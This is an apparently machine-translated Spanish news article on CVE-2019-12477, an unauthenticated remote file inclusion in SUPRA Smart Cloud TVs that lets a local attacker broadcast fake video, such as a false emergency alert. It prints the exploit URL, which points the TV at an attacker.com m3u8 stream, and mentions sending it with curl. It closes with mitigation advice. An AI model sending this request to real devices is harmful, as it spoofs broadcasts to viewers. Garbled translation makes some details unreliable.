El investigador de seguridad Dhiraj Mishra acaba de descubrir una vulnerabilidad de seguridad, CVE-2019-12477, en la marca smart TV SUPRA.
Al parecer,, Supra inteligente Nube TV permite la inclusión de archivos remoto en la función openLiveURL, lo que podría permitir a un atacante local para transmitir video falso sin ningún tipo de autenticación que utiliza / remote / media_control?action = Conjuntos&uri = URI.
Más sobre CVE-2.019 a 12.477
SUPRA es una empresa rusa que fabrica equipos de audio y vídeo, electrodomésticos y electrónica del automóvil. La mayor parte de la tecnología se está distribuyendo a través de sitios web de comercio electrónico basado en Rusia, China, y EAU.
En su informe, el investigador compartida que aprovechara `openLiveURL()`Que permite a un atacante local para transmitir video en la nube supra inteligente de TV. "He encontrado esta vulnerabilidad inicialmente por la revisión de código fuente y luego, mediante el rastreo de la aplicación y la lectura de cada petición me ayudó a activar esta vulnerabilidad,”Dijo Mishra.
Para activar la vulnerabilidad, un atacante sólo tendría que enviar una solicitud especialmente diseñada para la siguiente URL:
https://192.168.1.155/remoto / media_control?action = Conjuntos&uri = https://attacker.com/fake_broadcast_message.m3u8.
Aunque la URL anterior mención toma (.M3U8) formato de vídeo basado. Podemos usar `-v rizar -X GET` para enviar dicha solicitud, normalmente se trata de un archivo de inclusión remota unauth. Un atacante podría transmitir cualquier vídeo sin ninguna autenticación, el peor de los casos atacante podría aprovechar esta vulnerabilidad para transmitir un mensaje de emergencia falsa (derecho de miedo?).
El problema aquí es que la vulnerabilidad no parcheada permanece y es muy probable que se quedará de esta manera. El investigador no encontró ninguna manera de ponerse en contacto con el proveedor para informar de sus hallazgos. También hay un video de prueba de concepto que revela la explotación exitosa. El video muestra como un discurso de Steve Jobs es súbitamente reemplazado por falsa de un atacante “Mensaje de alerta de emergencia”.
La vulnerabilidad se le ha asignado un identificador de CVE, CVE-2019-12477, pero no hay información de si alguna vez será direcciones. Así, ¿qué pueden hacer los propietarios de televisores inteligentes SUPRA Nube? La respuesta corta es mantener la red inalámbrica tan segura como sea posible mediante el uso de una contraseña segura y un firewall para todos los dispositivos inteligentes. Porque, ya que estamos probadas cada día, casas inteligentes no son tan inteligentes en absoluto.
Un gran ejemplo de lo fácil que es para cortar una casa inteligente proviene de investigadores de Avast. El pasado agosto, advirtieron sobre el protocolo MQTT (Transporte de mensajes de cola de telemetría) cual, si mal configurado, podría dar a los hackers el acceso completo a una casa inteligente. Como resultado de este agujero de seguridad, la casa podría ser manipulada de muchas maneras, incluyendo sus sistemas de entretenimiento y de voz, varios dispositivos de uso doméstico, y puertas inteligentes.